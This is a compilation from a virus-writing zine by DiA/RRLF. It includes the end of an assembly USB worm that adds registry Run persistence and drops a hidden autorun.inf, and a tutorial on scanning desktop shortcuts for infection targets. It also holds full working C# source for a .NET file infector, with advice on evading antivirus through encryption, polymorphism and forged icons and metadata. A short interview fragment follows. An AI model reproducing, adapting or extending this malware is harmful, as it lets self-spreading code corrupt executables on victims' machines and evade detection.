0 ;overwrite if already exist cmp eax, 0 ;failure? jne GenerateAutorun ;if not a usb is plugged and we can generate the autostart.inf invoke Sleep,\ ;nothing plugged, sleep for 20 seconds 20000d ;20sec jmp DropToUsb ;loop it GenerateAutorun: ;drive available! usb plugged... invoke SetFileAttributes,\ ;hide our program WatchDrive,\ ;full path of it FILE_ATTRIBUTE_HIDDEN ;hidden mov dword [UsbFile], "auto" ;overwrite our copy path (driver.exe) with "autorun.inf" mov dword [UsbFile + 4d], "run." ;dword for dword mov dword [UsbFile + 8d], "inf" ;no lstrcat dude! invoke CreateFile,\ ;now create the autorun.inf WatchDrive,\ ;full path to usb (O:\autorun.inf) for example GENERIC_WRITE,\ ;just write to it 0,\ ;no shared mode 0,\ ;no security attributes CREATE_ALWAYS,\ ;overwrite if exist FILE_ATTRIBUTE_HIDDEN,\ ;create it hidden 0 ;no template file mov ebx, eax ;save file handle in ebx mov dword [SystemDir], "[aut" ;prepare the buffer, use already but not used buffer mov dword [SystemDir + 4d], "orun" ;dword for dword mov dword [SystemDir + 8d], "]" ;finished first line mov byte [SystemDir + 9d], 13d ;linebreak mov byte [SystemDir + 10d], 10d ;13, 10 mov dword [SystemDir + 11d], "open" ;open our program on connect mov dword [SystemDir + 15d], "=dri" ;driver.exe mov dword [SystemDir + 19d], "ver." ;lstrcat my ass mov dword [SystemDir + 23d], "exe" ;"exe" + terminating zero invoke WriteFile,\ ;write buffer to file ebx,\ ;file handle SystemDir,\ ;the buffer with the autostart.inf content 26d,\ ;number of bytes to write RegHandle,\ ;put number of written bytes to nowhere 0 ;no overlapped invoke CloseHandle,\ ;close file ebx ;via handle ret ;ExitProcess for poor people Datas: ;here are the needed datas Copyleft db "USBug - DiA/RRLF" ;bow! OurPath rb 256d ;here we store the path of this program SystemDir rb 256d ;buffer for system directory RegRunKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0 ;reg autostart RegHandle dd ? ;store reg handle here RegValueName db "Windows USB Driver", 0;fake value name for registry AllDrives rb 105d ;all available drives: C:\0D:\0E:\00 WatchDrive db "_:\" ;here we store the drive where a usb stick can be plugged UsbFile db 14d ;buffer for "driver.exe" and "autostart.inf" + terminating zero section "usb!" import data readable writeable ;our import table :) library kernel, "kernel32.dll",\ advapi, "advapi32.dll" import kernel,\ GetModuleFileName, "GetModuleFileNameA",\ CopyFile, "CopyFileA",\ GetLogicalDriveStrings, "GetLogicalDriveStringsA",\ Sleep, "Sleep",\ SetFileAttributes, "SetFileAttributesA",\ CreateFile, "CreateFileA",\ WriteFile, "WriteFile",\ CloseHandle, "CloseHandle",\ GetSystemDirectory, "GetSystemDirectoryA" import advapi,\ RegOpenKeyEx, "RegOpenKeyExA",\ RegSetValueEx, "RegSetValueExA",\ RegCloseKey, "RegCloseKey"

articles

Capture the desktop - scan .LNK files for victims DiA ______________________________________________________________ | | | Capture the desktop - scan .LNK files for victims |# | ************************************************* |# | |# | by DiA/rrlf (c)2004 |# | www.vx-dia.de.vu :: DiA_hates_machine@gmx.de |# |______________________________________________________________|# ############################################################### _Overview___________________________________ | | | 1. Intro |# | 2. LNK format |# | 3. How to get linked file, theory. |# | 4. How to get linked file, listing. |# | 5. How to get linked file, code. |# | 6. Play more with LNK files |# | 7. Outro |# |____________________________________________|# ############################################# Disclaimer ========== I am not responsible for anything that you do. If you use or rewrite this code you and only you are responsible for the things that you do. Take care! 1. Intro ======== Some people have a clean desktop other people have the total choas in the front of them. I speak about "Windows Shortcut Files" aka .LNK files. The shortcuts to applications, documents and other files. Most of the computer noobs use the desktop and the shortcuts very often, why not, the installation programs ask always to create a desktop shortcut. So this is a good way to find victims to infect (eg PE EXE files), if the shortcut file (.lnk) knows where the linked application or document is, we know it too (or must scan the .lnk file to know it). So lets go, find .lnk files, scan it and lets extract the full path of linked file! Have much fun with this little article... Thanks to BlueOwl for testing and his help. 2. LNK format ============= This is only a quick overview of the .lnk file format, for more information please read "The Windows Shortcut File Format as reverse-engineered by Jesse Hager". This is in my opinion the best document about .lnk files over the web. Overview: ********************************************************* Section | Size (hex) **********************|********************************** File Header | 4Ch ----------------------|---------------------------------- Shell Item ID List | ??h ;??h means that it doesn't have a static size ----------------------|---------------------------------- File Location Info | 22h ----------------------|---------------------------------- Local Volume Table | 10h + Volume Label (ASCIZ) ----------------------|---------------------------------- Network Volume Table | 14h + Network share name (ASCIZ) ----------------------|---------------------------------- Description String | ??h ----------------------|---------------------------------- Relative Path String | ??h ----------------------|---------------------------------- Working Directory | ??h ----------------------|---------------------------------- Commandline String | ??h ----------------------|---------------------------------- Icon Filename String | ??h ----------------------|---------------------------------- Extra stuff | ??h ********************************************************* File Header: ********************************************************* Offset | Size | Contents *******|*********|*************************************** 00h | 1 dword | 0000004Ch "L" identifies the .lnk file -------|---------|--------------------------------------- 04h | 16 byte | GUID of shortcut file -------|---------|--------------------------------------- 14h | 1 dword | Flags -------|---------|--------------------------------------- 18h | 1 dword | File Attributes -------|---------|--------------------------------------- 1Ch | 1 qword | Time 1 -------|---------|--------------------------------------- 24h | 1 qword | Time 2 -------|---------|--------------------------------------- 2Ch | 1 qword | Time 3 -------|---------|--------------------------------------- 34h | 1 dword | File Length -------|---------|--------------------------------------- 38h | 1 dword | Icon Number -------|---------|--------------------------------------- 3Ch | 1 dword | ShowWnd Value -------|---------|--------------------------------------- 40h | 1 dword | Hot Key -------|---------|--------------------------------------- 44h | 2 dword | Unknown, always Zero ********************************************************* Shell Item ID List: The Shell Item List section has no static size, it is variable. But thats not a hard problem, because first unsigned short integer (at 4Ch from file begin) indicates the total length of the whole Item List. We only have to read the size, and then add this size to 4Ch, then we are at "File Location Info" section. File Location Info: ********************************************************* Offset | Size | Contents *******|*********|*************************************** 00h | 1 dword | Total length of the structure -------|---------|--------------------------------------- 04h | 1 dword | Pointer to first offset at 1Ch -------|---------|--------------------------------------- 08h | 1 dword | Flags -------|---------|--------------------------------------- 0Ch | 1 dword | Offset of Local Volume Info -------|---------|--------------------------------------- 10h | 1 dword | Offset of Base Pathname (local) -------|---------|--------------------------------------- 14h | 1 dword | Offset of Network Volume Info -------|---------|--------------------------------------- 18h | 1 dword | Offset of Remaining Pathname ********************************************************* Local Volume Table: ********************************************************* Offset | Size | Contents *******|*********|*************************************** 00h | 1 dword | Length of the structure -------|---------|--------------------------------------- 04h | 1 dword | Type of Volume -------|---------|--------------------------------------- 08h | 1 dword | Volume Serial Number -------|---------|--------------------------------------- 0Ch | 1 dword | Offset of the Volume Name (10h) -------|---------|--------------------------------------- 10h | ASCIZ | Volume Label !!this is what we want!! ********************************************************* Network Volume Table: ********************************************************* Offset | Size | Contents *******|*********|*************************************** 00h | 1 dword | Length of the structure -------|---------|--------------------------------------- 04h | 1 dword | Unknown, always 02h?! -------|---------|--------------------------------------- 08h | 1 dword | Offset of the Network Share Name (14h) -------|---------|--------------------------------------- 0Ch | 1 dword | Unknown, always Zero? -------|---------|--------------------------------------- 10h | 1 dword | Unknown, always 20000h? -------|---------|--------------------------------------- 14h | ASCIZ | Network Share Name ********************************************************* Description String, Relative Path String, Working Directory, Commandline String, Icon Filename String and Extra stuff section are uninteresting for this tutorial. For better description read the article I recommend. I think Working Directory and Commandline String are interesting things for finding victims. But thats another story... 3. How to get linked file, theory. ================================== OK, now we know how the .lnk file is build. What we want is the "Volume Label" in the "Local Volume Table" section. But one (not big) problem, it have no static offset, because "Shell Item ID List" section size is variable. We have to read the size of this structure and add it to the "File Header" section, then we are at the "File Location Info" section. From this place it's not hard to get offset of "Volume Label". For better description a little graphik: ***************************** | File Begin 00h | ***************************** + ***************************** | File Header 4Ch | ***************************** = ***************************** | offset Shell Item ID List | ***************************** Now we have the offset to the "Shell Item ID List". First unsigned short integer indicates the size of this section. We read the size, now in this graphik called "ItemSize" (eg F5h or something). Go on: ***************************** | File Begin 00h | ***************************** + ***************************** | File Header 4Ch | ***************************** + ***************************** | ItemSize F5h | ***************************** = ***************************** | offset File Location Info | ***************************** Wow, we have the offset to the "File Location Info" section, now its not a hard way to get "Volume Label" (linked file). "File Location Info" and "Local Volume Table" have a static size. Appending to the "Local Volume Table" there is the string to the linked file ending with a zero. So lets get the offset of the first character at this string: ***************************** | File Begin 00h | ***************************** + ***************************** | File Header 4Ch | ***************************** + ***************************** | ItemSize F5h | ***************************** + ***************************** | File Location Info 22h | ***************************** + ***************************** | Local Volume Table 10h | ***************************** = ***************************** | offset to Volume Label | ***************************** Now we have the offset to our string. It is ASCIZero, so we only have to check byte by byte for an zero. If byte is a zero we have end of string, and as result the full path to the linked application. Good job, theoretical. :) Let's see listing and code... 4. How to get linked file, listing. =================================== Here is the "to do" list for scanning .lnk files on the desktop for victims: 1. Read desktop path from the registry 2. Check if path string is valid, if not make it valid 3. Change current directory to the desktop path 4. Find first .lnk file 5. No more files? then go to 17. 6. Map .lnk file to handle with it 7. Check if .lnk file is valid (first dword must be "L"000000h) 8. Get offset to "Shell Item ID List" section 9. Read size of the "Shell Item ID List" 10. Skip this section (File Header + Shell Item ID List size) 11. Get offset to "Volume Label" 12. Get end of the path string and copy the string 13. Check if extracted path is valid, if not goto 15. 14. Simple Messagebox (or infection routine :) 15. Unmap file, and close handles 16. Find next .lnk file, goto 5. 17. Exit 5. How to get linked file, code. ================================ ;==================================================================================== ; Example for scanning .lnk files for victims ; assemble it with FASM 1.56 (www.flatassembler.net) ; tested under WinXP SP1 ; ; coded by DiA/rrlf ; www.vx-dia.de.vu :: DiA_hates_machine@gmx.de ;==================================================================================== ; ;_____LNKscan.asm_____cut_____start__________________________________________________ include "%fasminc%\win32ax.inc" ;equates LNKscan: ;-----get desktop path from registry-------------------- invoke RegOpenKeyEx,\ ;open a reg key HKEY_CURRENT_USER,\ ;handle of the key DesktopSubkey,\ ;the subkey string 0,\ ;reserved KEY_ALL_ACCESS,\ ;security access mask RegHandle ;save here the handle cmp eax, 0 ;error? jnz ErrorMsg ;show error message invoke RegQueryValueEx,\ ;read a value dword [RegHandle],\ ;handle of open key DesktopValue,\ ;the value name "Desktop" 0,\ ;reserved Reg_SZ,\ ;we want a string DesktopPath,\ ;save here the desktop path DesktopSize ;size of reserved place cmp eax, 0 ;error? jnz ErrorMsg ;if so show a error message invoke RegCloseKey,\ ;we have the desktop path, close key dword [RegHandle] ;with the handle ;-----get desktop path from registry---end-------------- ;-----check if path is valid, if not make it valid------ mov edx, DesktopPath ;address of string GetZero: cmp byte [edx], 0 ;check for end of the string je GotZero ;we have the zero inc edx ;address + 1 jmp GetZero ;check next byte GotZero: dec edx ;address (,0) - 1 cmp byte [edx], "\" ;check for the slash je HaveSlash ;and dont place a slash inc edx ;jmp after last byte of the string mov byte [edx], "\" ;place the \ mov byte [edx + 1d], 0 ; "String",0 <- HaveSlash: ;-----check if path is valid, if not make it valid--end- ;-----change directory to desktop path------------------ invoke SetCurrentDirectory,\ ;change directory DesktopPath ;to the desktop path cmp eax, 0 ;error? je ErrorMsg ;no path, no victims ;-----change directory to desktop path---end------------ ;-----find first file in current directory-------------- invoke FindFirstFile,\ ;the well known api LnkFiles,\ ;search for *.lnk Win32FindData ;structure mov dword [FindHandle], eax ;save find handle FindMoreFiles: cmp eax, 0 ;error? no more files? je Exit ;exit the application ;-----find first file in current directory---end-------- ;-----map lnk file to handle with it-------------------- invoke CreateFile,\ ;open the file Win32FindData.cFileName,\ ;the lnk file GENERIC_READ + GENERIC_WRITE,\ ;read and write access FILE_SHARE_READ,\ ;open it when we can read 0,\ ;no security attributes OPEN_EXISTING,\ ;open only the file FILE_ATTRIBUTE_NORMAL,\ ;all attributes 0 ;no flag cmp eax, INVALID_HANDLE_VALUE ;error? je FindNextLNK ;find next lnk file mov dword [FileHandle], eax ;save file handle invoke CreateFileMapping,\ ;create the map dword [FileHandle],\ ;handle of file 0,\ ;no security attributes PAGE_READWRITE,\ ;read and write mapping 0,\ ;size high -> null 0,\ ;size low -> null = size of whole file 0 ;no mapping name cmp eax, 0 ;error?! je CloseFile ;close the file and search next mov dword [MapHandle], eax ;save mapping handle invoke MapViewOfFile,\ ;write map to address dword [MapHandle],\ ;handle of created map FILE_MAP_WRITE,\ ;read and write 0,\ ;high offset 0,\ ;low offset -> null, address is after call in eax 0 ;how much bytes should be mappep? 0-> all cmp eax, 0 ;error? je CloseMap ;if so close the map, search next file mov dword [MapAddress], eax ;save address in memory where file begins ;-----map lnk file to handle with it---end-------------- ;-----check if .lnk file is valid----------------------- mov esi, dword [MapAddress] ;filebegin now in esi cmp dword [esi], "L" ;first dword is a 4C000000h ? jne CloseMap ;close map, search more files ;-----check if .lnk file is valid---end----------------- ;-----get linked application---------------------------- add esi, 4Ch ;jump over header mov edi, ItemSize ;to copy size of Shell Item List movsb ;copy one byte, the size (esi->edi) JumpOverItem: cmp byte [ItemSize], 0d ;counter on zero? je JumpedOver ;then we jumped over the Shell Item List strcture inc esi ;address + 1 dec byte [ItemSize] ;counter - 1 jmp JumpOverItem ;next byte JumpedOver: add esi, 22h ;jump over FileLoationInfo add esi, 0Ch ;jump over Location Volume Table to the volume label (ASCIZ) mov edi, Victim ;destination is Victim (esi->edi) CopyVictimString: cmp byte [esi], 0 ;0 -> end of the string (ASCIZ[ero]) je HaveVictim ;time to infect :) movsb ;move one byte from esi to edi jmp CopyVictimString ;check again for end of string HaveVictim: mov dword [edi], 0 ;clear all after string ;-----get linked application---end---------------------- ;-----check if victim path is valid--------------------- mov edx, Victim ;get address cmp byte [edx + 1d], ":" ;check for the : (eg C:) jne CloseMap ;if not then close map, search next file GetVictimZero: cmp byte [edx], 0 ;check for end of string je HaveVictimZero ;we have it inc edx ;next byte jmp GetVictimZero ;search for zero HaveVictimZero: cmp byte [edx - 4d], "." ;check for dot (eg .exe) jne CloseMap ;search next ;-----check if victim path is valid---end--------------- ;******************************************************* ;*****HERE GO THE INFECTION***************************** ;******************************************************* invoke MessageBox,\ ;only show a messagebox that it works 0,\ ;now owner window Victim,\ ;show full path of victim Win32FindData.cFileName,\ ;caption: name of scanned .lnk file MB_ICONINFORMATION ;information 4 u ;******************************************************* ;*****HERE GO THE INFECTION***END*********************** ;******************************************************* ;-----unmap view of file-------------------------------- invoke UnmapViewOfFile,\ ;unmap the file dword [MapAddress] ;with the address ;-----unmap view of file---end-------------------------- ;-----close file and map handle------------------------- CloseMap: invoke CloseHandle,\ ;close dword [MapHandle] ;the map handle CloseFile: invoke CloseHandle,\ ;close the handle dword [FileHandle] ;file ;-----close file and map handle---end------------------- ;-----find next lnk file-------------------------------- FindNextLNK: invoke FindNextFile,\ ;next lnk file dword [FindHandle],\ ;via find handle Win32FindData ;and the structure jmp FindMoreFiles ;get more! ;-----find next lnk file---end-------------------------- ;-----get the hell out of here-------------------------- Exit: invoke ExitProcess,\ ;exit 0 ;current process ;-----get the hell out of here---end-------------------- ;-----error message------------------------------------- ErrorMsg: invoke MessageBox,\ ;shit, some error 0,\ ;no owner window "Sorry, can't set desktop directory!",\ ;text ".:: ERROR ::.",\ ;caption MB_ICONERROR ;scary error icon ;) jmp Exit ;get out of here ;-----error message---end------------------------------- ;-----data's-------------------------------------------- DesktopSubkey db "Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders",0 DesktopValue db "Desktop",0 DesktopPath rb 255d DesktopSize db 255d RegHandle dd ? Reg_SZ db "REG_SZ",0 Win32FindData FINDDATA ;already defined by fasm LnkFiles db "*.lnk",0 FindHandle dd ? FileHandle dd ? MapHandle dd ? MapAddress dd ? ItemSize db ? Victim rb 255d ;-----data's---end--------------------------------------- ;-----api's import, fasm will do------------------------- data import ;only one section, fasm will do it :) library kernel32, "KERNEL32.DLL",\ user32, "USER32.DLL",\ advapi32, "ADVAPI32.DLL" import kernel32,\ SetCurrentDirectory, "SetCurrentDirectoryA",\ FindFirstFile, "FindFirstFileA",\ FindNextFile, "FindNextFileA",\ CreateFile, "CreateFileA",\ CreateFileMapping, "CreateFileMappingA",\ MapViewOfFile, "MapViewOfFile",\ UnmapViewOfFile, "UnmapViewOfFile",\ CloseHandle, "CloseHandle",\ ExitProcess, "ExitProcess" import advapi32,\ RegOpenKeyEx, "RegOpenKeyExA",\ RegQueryValueEx, "RegQueryValueExA",\ RegCloseKey, "RegCloseKey" import user32,\ MessageBox, "MessageBoxA" end data ;-----api's import, fasm will do---end------------------- ;_____LNKscan.asm_____cut_____end____________________________________________________ 6. Play more with LNK files =========================== OK, now we have hopefully get the linked file. Another interesting thing (maybe for worms) in the .lnk file is the "Network Share Name" in the "Network Volume Table". Its not very different from reading the "Volume Label", we only have to get the size of the "Shell Item ID List" and the size of the "Volume Label". Then add it all to get the offset to the "Network Volume Table". For this I have make a little graphik too: ***************************** | File Begin 00h | ***************************** + ***************************** | File Header 4Ch | ***************************** + ***************************** | ItemSize F5h | ;size variable ***************************** + ***************************** | File Location Info 22h | ***************************** + ***************************** | Local Volume Table 10h | ***************************** + ***************************** | size of Volume Label 0A | ;size variable ***************************** + ***************************** | Network Volume Table 14h | ***************************** = ***************************** | offset Network Share Name | ***************************** So, you see it's not hard when we known size of "Shell Item ID List" and the size of the "Volume Label" string. "Network Share Name" is also ASCIZ, means that the zero is the end of the string. 7. Outro ======== Thats the end my friend, the end of this article. Hope you learned something, or get some inspiration for other projects. If you have questions, greets or fucks feel free to send me a mail to DiA_hates_machine@gmx.de or make a entry in my guestbook at http://www.vx-dia.de.vu ! See you... DiA/rrlf - 27.11.2004

articles

Using the .NET runtime compiler for file infection DiA ______________________________________________________________ | | | Using the .NET runtime compiler for file infection |# | »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» |# | |# | by DiA/RRLF (c)2006 |# | www.vx-dia.de.vu :: DiA_hates_machine@gmx.de |# |______________________________________________________________|# ############################################################### _Overview___________________________________ | | | 1_Intro |# | 2_The main idea |# | 3_My ideas, and what not worked |# | 4_How it can work |# | 5_Working source code |# | 6_Make it strong, further ideas |# | 7_Outro |# |____________________________________________|# ############################################# .Disclaimer »»»»»»»»»» The author of this article is NOT responsible for possible damages in case of informations you getting here. You do your own things at your own risk, please don't do anything stupid for your own security. This document is for educational purpose only. If you do NOT agree this, please close this for your own pleasure! .1_Intro »»»»»»» Hello and welcome to my second article on .NET and C#. Again I got bored of programming in C++. So, this is again a sidestep in the easy and simple world of .NET programming. In this tutorial I describe how to infect executables by using the .NET runtime compiler. Also I provide a workin source code with comments and ideas/hints how to make a real virus with this technique. .2_The main idea »»»»»»»»»»»»»»» When I played with the runtime compiler, I also checked out all the compiler options and parameters. Resource files (any kind, .jpg, .doc, .xxx) can be compiled within the source. And .NET provides a ResourceManager, wich makes reading resources in .NET files very easy. So the main idea is to compile the virus every time new when a victim was found, and the victim will be added as resource. Then on runtime, extract resource and run the host file. To act like this, the virus must have its own source, to compile. Since .NET executables (not abused) is like open source (use Reflector) we just don't really care. .3_My ideas, and what not worked »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» I got good ideas before I started coding this example virus, but it turned out that much don't work very well: Source as String - I wanted to store the source code of the virus as string in the virus body. It was much much work, and not really worth it. You have to care that your source is compiled right (care for " as example), string max length (in source) is 2046 bytes. Load host in memory - You can load a .NET assembly (a .exe for example), and invoke (execute) it in your current running application. This would be nice, cause you dont have to drop host on disk and run it. But it turned out that this technique is just fine for stand- alone application. Try to execute a application linked to .dll's or other needed files will cause problems or errors. Anyway, here is the source I tried, host file is in a byte array: //... Assembly HostAsm = Assembly.Load(HostArray); //byte array, .exe MethodInfo HostMethod = HostAsm.EntryPoint; //main HostMethod.Invoke(HostAsm.CreateInstance(HostMethod.Name), null); //execute //... Check for infection - To not re-infect files, we have to check for infection. Good, as .NET have a ResourceManager, and the already infected files must have a resource named like we want it. Try to read a byte, if no error occours the file seems to be infected, error means no resource named like we have, means not infected. But somehow I can't close the resource stream when the host resource doesn't exist. And if the stream is still open, we can't delete the victim file (nor recompile it). It's mystic that .NET allow to open a not existing stream, but it's not able to close this stream. Anyway, improve! .4_How it can work »»»»»»»»»»»»»»»»» So, much don't work as I wanted, improve is the keyword. And improve means going simple, and use already known techniques. This is how the example virus works: The virus source is also in the binary as resource, and will be read and drop to disc when needed. But first the host is read from the resource stream, dropped to disc, and executed. After termination the temporary host will be deleted. Here goes the infection (source code is already on disc). The virus find all .exe files in current directory, copy that file to <filename>.res, delete original victim, and compile the virus source (in same directory) to the .exe name of the victim. On compiling it add's the host binary and the virus source as resource. After compilation the virus writes it's infection marker in the PE header. If something goes wrong the temp resource file is copied back, to leave host uninfected. Before infecting the virus also checks if the found .exe is a .NET application and if the victim is already infected, by checking 4 bytes in the PE header (WIN32_VERSION). For more details please check the source code in the next section, there are also comments for helping you to understand what I mean. .5_Working source code »»»»»»»»»»»»»»»»»»»»» using System; using System.IO; using System.Reflection; using System.CodeDom.Compiler; using Microsoft.CSharp; using System.Resources; using System.Diagnostics; using System.Windows.Forms; //namespaces we use in this virus namespace Biskin //our namespace { class DiA //we use just this one class, simple virus { static void Main(string[] args) //our entry point { byte[] Marker = {0x42, 0x53, 0x4B, 0x69}; //"BSKi", our infection marker to prevent re-infection string SourceName = ""; //here we store the extracted source code, we define it here because we handle it in more try/catch then one Random RanNumber = new Random(DateTime.Now.Millisecond); //to generate random number, user current millisecond as seed Assembly ThisAsm = Assembly.GetExecutingAssembly(); //the own assembly, to extract the resources (host & source) try //we use some try/catch blocks in this virus, error handling in c# is nice { Stream ResStream = ThisAsm.GetManifestResourceStream("host.bin"); //get the stream for the resource "host.bin" string HostName = RanNumber.Next(99999).ToString() + ".scr"; //generate a temporary host name, just andom number and .scr extension FileStream HostTemp = new FileStream(HostName, FileMode.CreateNew, FileAccess.Write); //filestream to write from resource to file for(int i = 0; i < ResStream.Length; i++) //write byte by byte until we reach end of file { HostTemp.WriteByte(Convert.ToByte(ResStream.ReadByte())); //read byte from stream and write it to file } HostTemp.Close(); //close file stream ResStream.Close(); //close resource stream File.SetAttributes(HostName, FileAttributes.Hidden); //set the temp host to hidden string HostParameters = " "; //to store host's parameter, drag and drop or called via command line for(int i = 0; i < args.Length; i++) //for each argument (parameter) given to the virus { HostParameters += args[i] + " "; //append it to string and put a space between } Process.Start(HostName + HostParameters).WaitForExit(); //start temporary host and wait for it's termination File.Delete(HostName); //after termination, delete the temporary host } catch //error on reading resource or write/run temp host { MessageBox.Show("Can't execute application", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error); //show fake error then } try //try to extract source code { Stream SrcStream = ThisAsm.GetManifestResourceStream("biskin.src"); //get stream to resource SourceName = RanNumber.Next(99999).ToString() + ".cs"; //create temporary source file name, random number FileStream SourceTemp = new FileStream(SourceName, FileMode.CreateNew, FileAccess.Write); //open filestream for write source to disk for(int i = 0; i < SrcStream.Length; i++) //write byte by byte { SourceTemp.WriteByte(Convert.ToByte(SrcStream.ReadByte())); //read byte from resource and write it to file } SourceTemp.Close(); //close file stream SrcStream.Close(); //close resource stream } catch //error on reading/writing source code { Application.Exit(); //no source, no infection is possible, exit virus } string[] Files = Directory.GetFiles(Directory.GetCurrentDirectory(), "*.exe"); //get all .exe files in current directory foreach(string Victim in Files) //for loop all files in the array { try{AssemblyName.GetAssemblyName(Victim);} //easy way to check if founded file is a .NET catch{continue;} //if no .NET executable, try next file byte[] IsMarker = new byte[4]; //array where we read the marker FileStream VictimFile = new FileStream(Victim, FileMode.Open, FileAccess.Read); //open potential vicitm for read for(int i = 0; i < 136; i++) //skip first bytes { VictimFile.ReadByte(); //by reading bytes to nothing } VictimFile.Read(IsMarker, 0, Marker.Length); //read now 4 bytes to array VictimFile.Close(); //and close file stream //check if readed bytes are our infection marker, if so try next file if(IsMarker[0] == Marker[0] && IsMarker[1] == Marker[1] && IsMarker[2] == Marker[2] && IsMarker[3] == Marker[3]) continue; string ResourceFile = Victim.Remove(Victim.Length - 3, 3) + "res"; //create temp file name for the host resource File.Copy(Victim, ResourceFile); //copy uninfected host to temporary file File.SetAttributes(ResourceFile, FileAttributes.Hidden); //and set it to hidden try{File.Delete(Victim);} //try to delete the victim catch { File.Delete(ResourceFile); //if it still run, delete temp resource file continue; //and leave it uninfected } try //action! try to compile virus source with source and host binary as resource { ICodeCompiler Compiler = new CSharpCodeProvider().CreateCompiler(); //create compiler CompilerParameters Parameter = new CompilerParameters(); //and it's parameters Parameter.GenerateExecutable = true; //we want to create a exe, sure Parameter.MainClass = "Biskin.DiA"; //the main class, we are now in it Parameter.OutputAssembly = Victim; //compile output, the victim name (we deleted it already) //some raw compiler commands, optimize output, make windows application (no command prompt shit) //and add via "/resource" the host binary (we copy it before) and the virus source (we extracted it before) Parameter.CompilerOptions = "/optimize /target:winexe /resource:" + ResourceFile + ",host.bin /resource:" + SourceName + ",biskin.src"; foreach(Assembly Asm in AppDomain.CurrentDomain.GetAssemblies()) //lazy style { Parameter.ReferencedAssemblies.Add(Asm.Location); //just reference all assemblies we found, so we are sure our virus has all to compile } if(Compiler.CompileAssemblyFromFile(Parameter, SourceName).Errors.Count == 0) //compile! and check if no compile errors { VictimFile = new FileStream(Victim, FileMode.Open, FileAccess.ReadWrite); //open the freshly compiled executable for(int i = 0; i < 136; i++) //skip first bytes { VictimFile.ReadByte(); //by read bytes to nothing } VictimFile.Write(Marker, 0, Marker.Length); //then write our infection marker to WIN32_VERSION in the PE header (unused space) VictimFile.Close(); //close file stream } else //argh, compiler error { File.Copy(ResourceFile, Victim); //copy resource file back to real name, and leave it uninfected } File.Delete(ResourceFile); //delete reosurce file and handle next file } catch{} //any error is redirected here, just do nothing } try{File.Delete(SourceName);} //try to delete source file, should work catch{File.SetAttributes(SourceName, FileAttributes.Hidden);} //if it's still in use just set it to hidden } } } //done. .6_Make it strong, further ideas »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» Sure, the provided source code is just a proof of concept, and not done to stay in the wild or anything like that. Here are some add's you have to make if you want make this virus (or your virus) a good one: Where is my icon? The icon of the compiled virus (within host) is the default windows application icon, cause we didn't give the compiler any icon. To prevent this, just extract the icon from the potential victim (google hint: Code Corner - Tools - Icon Browser), and give it as compiler parameter "/win32icon:filename". After that delete the extracted icon. And all is fine. And where are my file properties? Also the compiled file don't have any properties, such as Name, Copyright, Trademark, etc. This is also very simple issue, properties of the file can be read like this: //... foreach(object Attribute in Assembly.LoadFrom("Victim.exe").GetCustomAttributes(false)) //check all attributes { AssemblyCopyrightAttribute Copyleft = Attribute as AssemblyCopyrightAttribute; //as copyright attribute, as example if(Copyleft != null) //found copyright attribute? { string OldCopyright = Copyleft.Copyright; //the copyright to string } } //others can be read in the same way //... Then write in the virus source (after used namespaces, before own namespace) this (don't foget namespaces System.Reflection and System.Runtime.CompilerServices): //... [assembly: AssemblyCopyright(OldCopyright)] //... Other assembly informations are AssemblyTitle, AssemblyDescription, AssemblyConfiguration, AssemblyCompany, AssemblyProduct, AssemblyTrademark, AssemblyCulture. Filetime? Also take care for filetime, read filetime of potential victim and set it after compilation again. Easy, huh? Detected in < 1min? This is not a hard take for AV people, cause the plain source is stored. So a good idea is to encrypt the source code resource. Maybe also with a changing key. .NET provides also encryption classes like DES or even TripleDES. Also you can encrypt the host resource, so it can't be easiely cut out of the virus and be restored. More More More! Now it's on you, imagin you are at source level, so polymorphism is not a hard take, also adding garbage is a good idea. Encrypt strings, split source to 100s classes, etc etc. Use your brain. .7_Outro »»»»»»» Hope you liked this article and the idea how to use the .NET runtime compiler for file infection. If you do anything in this way, let me know, DiA_hates_machine@gmx.de. Next time friends, bye. DiA/RRLF - 23.08.2006

articles

That's it DiA That's it. With the RRLF Best Of I resign from the VX scene. I had a blast meeting very nice people, virtual or even real life. You all know who you are! I wish you all luck in the future, keep kicking asses. I will regularly check news about viruses etc. and I hope that you people, the left VX scene, and new dudes will bring a smile in my face by providing innovative ideas and contrast from all that commercial criminal software shit. Also I will still regularly check my mail DiA_hates_machine@gmx.de. Drop some lines if you feel like! Thanks, DiA - RRLF Rockstars

arts

A Bath disk0rdia

arts

Dare a Step out of the Norm disk0rdia

arts

Rotted Dolomite

articles

Interview mit Necronomikon dr.g0nZo dr.g0nZo: Hi Necronomikon! Wie gehts so? Kannst du uns sagen, wo du zur Zeit wohnst, und wie alt du bist? Necronomikon: Hi ppl,mir gehts zur Zeit bestens (mit einigen Ausnahmen,aber es wird schon wieder)! Zeit wohne ich in Niedersachsen (Germany;)) und bin 19Jahre alt. dr.g0nZo: Was machst du so, gehst du noch zur Schule? Necronomikon: Seit gut einem halben Jahr besuche ich eine Berufsschule in meiner Stadt (mal sehen was es bringt!?) dr.g0nZo: Gibts irgendwelche Stammlokale oder Discos in die du gehst? Necronomikon: Da gibt es einige in der Stadt zum Beispiel das Flax, das Malibu, Schiller Pub, das Strohhalm in denen ich mich am Wochenende aufhalte, wenn ich nicht grade Discos besuche wie das Bierdorf in meiner Stadt oder ausserhalb das Novum, Fun2000 (auch andere in "H"!), JollyJoker, Inkognito und andere.... (Na! Wisst ihr wo ich herkomme!???) dr.g0nZo: Du warst mal Member bei uns, warum bist du wieder ausgetreten? Angeblich hast du Deutschland auch mal verlassen, Probleme mit dem Staat? Necronomikon: Das ich Member bei euch war ist richtig, bin ausgetreten, da ich zu der Zeit viel zu Tun hatte und mir nicht viel zum Coden übrig blieb, wollte nicht als Faulermember aus der Group gekickt werden, wie bei DPS (die nicht wissen das ein Virus manchmal länger braucht als nur 10 mins.!), deswegen stieg ich erstmal aus um mich mit anderen Sachen zu befassen! (Freunde, etc...) dr.g0nZo: Hast du Erfahrung mit Drogen? Necronomikon: Drogen! Früher ja, auf Parties und in Discos (PartyStuff;))! Hab weniger Konsumiert, mehr verkauft! Jetzt so gut wie gar nix mehr, da es dich als Sportler eher negativ beeinflusst!!! dr.g0nZo: Was hat dich dazu bewegt in die VX Szene einzusteigen? Necronomikon: 